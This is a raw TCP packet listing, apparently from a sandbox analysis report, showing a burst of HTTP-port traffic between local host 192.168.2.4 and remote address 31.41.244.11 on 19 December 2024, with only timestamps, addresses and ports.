                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.918081045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.918123007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.918169022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.919147968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.919199944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.919230938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.919281006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.920182943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.920236111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.920384884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.920442104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.921315908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.921437979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.921492100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.922389030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.922456026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.922493935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.923535109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.923557043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.923623085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.923652887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.924580097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.924623966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.924669981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.924707890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.924850941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.925765038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.925803900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.925820112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.925842047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.926841974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.926913977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.926949024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.927054882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.927932978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.928066015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.928152084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.929069042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.929130077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.929141045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.929219007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.930176020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.930314064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.930352926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.930387974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.931356907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.931372881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.931536913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.932437897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.932461977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.932490110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.932506084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.933470011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.933538914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.933577061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.934026003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.934560061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.934655905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.934695959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.934739113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.935688019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.935794115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.935822964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.936187983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.936805010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.936958075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.937231064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.937925100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.938081980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.938110113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.938148022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.939002037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.939096928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.939121962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.939230919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.940217018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.940232992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.940295935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.941170931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.942219019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.075236082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.075349092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.075475931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.075814009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.075829983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.076000929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.076879978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.077040911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.077156067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.078082085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.078099012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.078182936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.078183889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.079091072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.079153061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.079199076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.079291105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.080220938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.080338001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.080399990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.081336021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.081428051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.081489086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.082413912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.082526922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.082559109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.083519936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.083591938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.083622932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.084055901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.084676981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.084703922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.084908009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.085803032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.085885048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.085990906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.086886883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.086944103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.087050915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.087979078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.088040113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.088069916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.089068890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.089140892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.089212894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.090198040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.090259075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.090257883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.090399027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.091280937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.091377974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.091433048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.092426062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.092479944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.092561007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.093499899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.093549967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.093586922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.094007015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.094623089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.094702005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.094772100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.095781088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.095813990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.095895052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.096823931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.096889019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.096916914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.096961975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.097912073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.097966909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.098058939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.098107100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.099028111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.099138021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.099188089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.100126028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.100316048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.100470066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.101275921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.101370096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.101427078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.102412939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.102494955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.102603912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.103447914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.103526115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.103578091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.104038954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.104567051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.104659081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.104722977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.105701923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.105789900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.105819941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.105914116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.106756926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.106853962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.106884003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.107594013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.107858896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.107914925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.107999086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.109004974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.109138012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.109139919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.110107899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.110187054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.110217094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.110279083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.111244917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.111354113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.111404896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.112418890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.112435102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.112481117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.113430977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.113507032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.113534927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.114613056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.114686012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.114703894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.115648985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.115698099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.115737915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.115786076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.116745949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.116846085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.117014885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.117850065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.117969036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.118021965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.118969917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.119020939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.119116068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.120069981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.120100021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.120191097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.120277882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.121608019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.121644974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.121696949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.122340918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.122440100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.122500896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.123404026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.123500109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.123511076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.124037981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.124531031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.124598980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.124612093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.125597954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.125742912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.125767946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.126789093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.126849890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.126871109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.127892971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.127907991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.127947092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.127974987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.128943920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.129055977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.129158974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.130079985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.130142927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.130218029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.131184101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.131329060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.131448030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.132258892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.132369995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.132455111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.133310080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.133439064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.267438889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.267679930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.267796040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.267988920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.268080950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.268152952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.269077063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.269130945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.269213915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.270243883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.270284891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.270322084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.271559000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.271642923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.271672964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.271739960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.272480965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.272559881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.272681952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.273531914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.273649931 CET804986031.41.244.11192.168.2.4
